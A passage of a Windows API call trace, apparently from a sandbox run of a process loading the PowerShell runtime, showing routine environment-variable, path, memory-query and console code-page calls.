lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.681] GetLastError () returned 0xcb [0043.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.686] GetLastError () returned 0xcb [0043.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.706] GetLastError () returned 0xcb [0043.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.711] GetLastError () returned 0xcb [0043.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.713] GetLastError () returned 0xcb [0043.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.727] GetLastError () returned 0xcb [0043.753] VirtualQuery (in: lpAddress=0x510d96c, lpBuffer=0x510e96c, dwLength=0x1c | out: lpBuffer=0x510e96c*(BaseAddress=0x510d000, AllocationBase=0x4780000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.874] VirtualQuery (in: lpAddress=0x510d96c, lpBuffer=0x510e96c, dwLength=0x1c | out: lpBuffer=0x510e96c*(BaseAddress=0x510d000, AllocationBase=0x4780000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.879] GetLastError () returned 0xcb [0043.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.879] GetLastError () returned 0xcb [0043.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.880] GetLastError () returned 0xcb [0043.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.880] GetLastError () returned 0xcb [0043.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.909] GetLastError () returned 0xcb [0043.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.909] GetLastError () returned 0xcb [0043.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.910] GetLastError () returned 0xcb [0043.943] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0043.944] GetLastError () returned 0xcb [0043.944] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x510e4b0 | out: lpConsoleScreenBufferInfo=0x510e4b0) returned 1 [0043.944] GetLastError () returned 0xcb [0043.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.952] GetLastError () returned 0xcb [0043.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.955] GetLastError () returned 0xcb [0043.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.955] GetLastError () returned 0xcb [0043.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x510dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.955] GetLastError () returned 0xcb [0044.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.055] GetLastError () returned 0xcb [0044.163] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0044.164] GetLastError () returned 0xcb [0044.165] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x510ebc4 | out: lpConsoleScreenBufferInfo=0x510ebc4) returned 1 [0044.165] GetLastError () returned 0xcb [0044.173] GetConsoleOutputCP () returned 0x1b5 [0044.181] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.181] GetLastError () returned 0xcb [0044.181] GetConsoleOutputCP () returned 0x1b5 [0044.182] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.182] GetLastError () returned 0xcb [0044.182] GetConsoleOutputCP () returned 0x1b5 [0044.183] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.183] GetLastError () returned 0xcb [0044.183] GetConsoleOutputCP () returned 0x1b5 [0044.183] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.183] GetLastError () returned 0xcb [0044.183] GetConsoleOutputCP () returned 0x1b5 [0044.184] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.184] GetLastError () returned 0xcb [0044.184] GetConsoleOutputCP () returned 0x1b5 [0044.184] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.184] GetLastError () returned 0xcb [0044.184] GetConsoleOutputCP () returned 0x1b5 [0044.185] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.185] GetLastError () returned 0xcb [0044.185] GetConsoleOutputCP () returned 0x1b5 [0044.185] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.185] GetLastError () returned 0xcb [0044.185] GetConsoleOutputCP () returned 0x1b5 [0044.186] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.186] GetLastError () returned 0xcb [0044.186] GetConsoleOutputCP () returned 0x1b5 [0044.186] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.186] GetLastError () returned 0xcb [0044.186] GetConsoleOutputCP () returned 0x1b5 [0044.186] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.187] GetLastError () returned 0xcb [0044.187] GetConsoleOutputCP () returned 0x1b5 [0044.187] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.187] GetLastError () returned 0xcb [0044.187] GetConsoleOutputCP () returned 0x1b5 [0044.187] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.187] GetLastError () returned 0xcb [0044.188] GetConsoleOutputCP () returned 0x1b5 [0044.188] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.188] GetLastError () returned 0xcb [0044.188] GetConsoleOutputCP () returned 0x1b5 [0044.188] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.188] GetLastError () returned 0xcb [0044.188] GetConsoleOutputCP () returned 0x1b5 [0044.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.189] GetLastError () returned 0xcb [0044.189] GetConsoleOutputCP () returned 0x1b5 [0044.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.189] GetLastError () returned 0xcb [0044.189] GetConsoleOutputCP () returned 0x1b5 [0044.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.190] GetLastError () returned 0xcb [0044.190] GetConsoleOutputCP () returned 0x1b5 [0044.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.190] GetLastError () returned 0xcb [0044.190] GetConsoleOutputCP () returned 0x1b5 [0044.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.191] GetLastError () returned 0xcb [0044.191] GetConsoleOutputCP () returned 0x1b5 [0044.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.191] GetLastError () returned 0xcb [0044.191] GetConsoleOutputCP () returned 0x1b5 [0044.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.192] GetLastError () returned 0xcb [0044.192] GetConsoleOutputCP () returned 0x1b5 [0044.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.192] GetLastError () returned 0xcb [0044.192] GetConsoleOutputCP () returned 0x1b5 [0044.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.193] GetLastError () returned 0xcb [0044.193] GetConsoleOutputCP () returned 0x1b5 [0044.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.193] GetLastError () returned 0xcb [0044.193] GetConsoleOutputCP () returned 0x1b5 [0044.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.193] GetLastError () returned 0xcb [0044.194] GetConsoleOutputCP () returned 0x1b5 [0044.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.195] GetLastError () returned 0xcb [0044.195] GetConsoleOutputCP () returned 0x1b5 [0044.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.195] GetLastError () returned 0xcb [0044.195] GetConsoleOutputCP () returned 0x1b5 [0044.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.196] GetLastError () returned 0xcb [0044.196] GetConsoleOutputCP () returned 0x1b5 [0044.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.197] GetLastError () returned 0xcb [0044.197] GetConsoleOutputCP () returned 0x1b5 [0044.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.198] GetLastError () returned 0xcb [0044.198] GetConsoleOutputCP () returned 0x1b5 [0044.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.198] GetLastError () returned 0xcb [0044.198] GetConsoleOutputCP () returned 0x1b5 [0044.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.199] GetLastError () returned 0xcb [0044.199] GetConsoleOutputCP () returned 0x1b5 [0044.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.199] GetLastError () returned 0xcb [0044.199] GetConsoleOutputCP () returned 0x1b5 [0044.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.199] GetLastError () returned 0xcb [0044.200] GetConsoleOutputCP () returned 0x1b5 [0044.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.200] GetLastError () returned 0xcb [0044.200] GetConsoleOutputCP () returned 0x1b5 [0044.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.200] GetLastError () returned 0xcb [0044.200] GetConsoleOutputCP () returned 0x1b5 [0044.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.201] GetLastError () returned 0xcb [0044.201] GetConsoleOutputCP () returned 0x1b5 [0044.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.201] GetLastError () returned 0xcb [0044.201] GetConsoleOutputCP () returned 0x1b5 [0044.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.202] GetLastError () returned 0xcb [0044.202] GetConsoleOutputCP () returned 0x1b5 [0044.202] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.202] GetLastError () returned 0xcb [0044.202] GetConsoleOutputCP () returned 0x1b5 [0044.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.203] GetLastError () returned 0xcb [0044.203] GetConsoleOutputCP () returned 0x1b5 [0044.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.203] GetLastError () returned 0xcb [0044.203] GetConsoleOutputCP () returned 0x1b5 [0044.203] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.204] GetLastError () returned 0xcb [0044.204] GetConsoleOutputCP () returned 0x1b5 [0044.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.204] GetLastError () returned 0xcb [0044.204] GetConsoleOutputCP () returned 0x1b5 [0044.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.204] GetLastError () returned 0xcb [0044.204] GetConsoleOutputCP () returned 0x1b5 [0044.204] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.204] GetLastError () returned 0xcb [0044.205] GetConsoleOutputCP () returned 0x1b5 [0044.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.205] GetLastError () returned 0xcb [0044.205] GetConsoleOutputCP () returned 0x1b5 [0044.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.205] GetLastError () returned 0xcb [0044.205] GetConsoleOutputCP () returned 0x1b5 [0044.205] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.205] GetLastError () returned 0xcb [0044.205] GetConsoleOutputCP () returned 0x1b5 [0044.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.206] GetLastError () returned 0xcb [0044.206] GetConsoleOutputCP () returned 0x1b5 [0044.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.206] GetLastError () returned 0xcb [0044.206] GetConsoleOutputCP () returned 0x1b5 [0044.206] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.206] GetLastError () returned 0xcb [0044.206] GetConsoleOutputCP () returned 0x1b5 [0044.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.207] GetLastError () returned 0xcb [0044.207] GetConsoleOutputCP () returned 0x1b5 [0044.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.207] GetLastError () returned 0xcb [0044.207] GetConsoleOutputCP () returned 0x1b5 [0044.207] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.207] GetLastError () returned 0xcb [0044.207] GetConsoleOutputCP () returned 0x1b5 [0044.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.208] GetLastError () returned 0xcb [0044.208] GetConsoleOutputCP () returned 0x1b5 [0044.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.208] GetLastError () returned 0xcb [0044.208] GetConsoleOutputCP () returned 0x1b5 [0044.208] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.208] GetLastError () returned 0xcb [0044.208] GetConsoleOutputCP () returned 0x1b5 [0044.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.209] GetLastError () returned 0xcb [0044.209] GetConsoleOutputCP () returned 0x1b5 [0044.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.209] GetLastError () returned 0xcb [0044.209] GetConsoleOutputCP () returned 0x1b5 [0044.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.209] GetLastError () returned 0xcb [0044.209] GetConsoleOutputCP () returned 0x1b5 [0044.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.210] GetLastError () returned 0xcb [0044.210] GetConsoleOutputCP () returned 0x1b5 [0044.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.210] GetLastError () returned 0xcb [0044.210] GetConsoleOutputCP () returned 0x1b5 [0044.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.210] GetLastError () returned 0xcb [0044.210] GetConsoleOutputCP () returned 0x1b5 [0044.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.211] GetLastError () returned 0xcb [0044.211] GetConsoleOutputCP () returned 0x1b5 [0044.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.211] GetLastError () returned 0xcb [0044.211] GetConsoleOutputCP () returned 0x1b5 [0044.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.211] GetLastError () returned 0xcb [0044.211] GetConsoleOutputCP () returned 0x1b5 [0044.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.211] GetLastError () returned 0xcb [0044.212] GetConsoleOutputCP () returned 0x1b5 [0044.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.212] GetLastError () returned 0xcb [0044.212] GetConsoleOutputCP () returned 0x1b5 [0044.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.212] GetLastError () returned 0xcb [0044.212] GetConsoleOutputCP () returned 0x1b5 [0044.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.213] GetLastError () returned 0xcb [0044.213] GetConsoleOutputCP () returned 0x1b5 [0044.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.213] GetLastError () returned 0xcb [0044.213] GetConsoleOutputCP () returned 0x1b5 [0044.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.213] GetLastError () returned 0xcb [0044.213] GetConsoleOutputCP () returned 0x1b5 [0044.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.213] GetLastError () returned 0xcb [0044.213] GetConsoleOutputCP () returned 0x1b5 [0044.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.214] GetLastError () returned 0xcb [0044.214] GetConsoleOutputCP () returned 0x1b5 [0044.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.214] GetLastError () returned 0xcb [0044.214] GetConsoleOutputCP () returned 0x1b5 [0044.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.214] GetLastError () returned 0xcb [0044.214] GetConsoleOutputCP () returned 0x1b5 [0044.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.214] GetLastError () returned 0xcb [0044.214] GetConsoleOutputCP () returned 0x1b5 [0044.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.215] GetLastError () returned 0xcb [0044.215] GetConsoleOutputCP () returned 0x1b5 [0044.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.215] GetLastError () returned 0xcb [0044.215] GetConsoleOutputCP () returned 0x1b5 [0044.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.215] GetLastError () returned 0xcb [0044.215] GetConsoleOutputCP () returned 0x1b5 [0044.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.215] GetLastError () returned 0xcb [0044.215] GetConsoleOutputCP () returned 0x1b5 [0044.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.216] GetLastError () returned 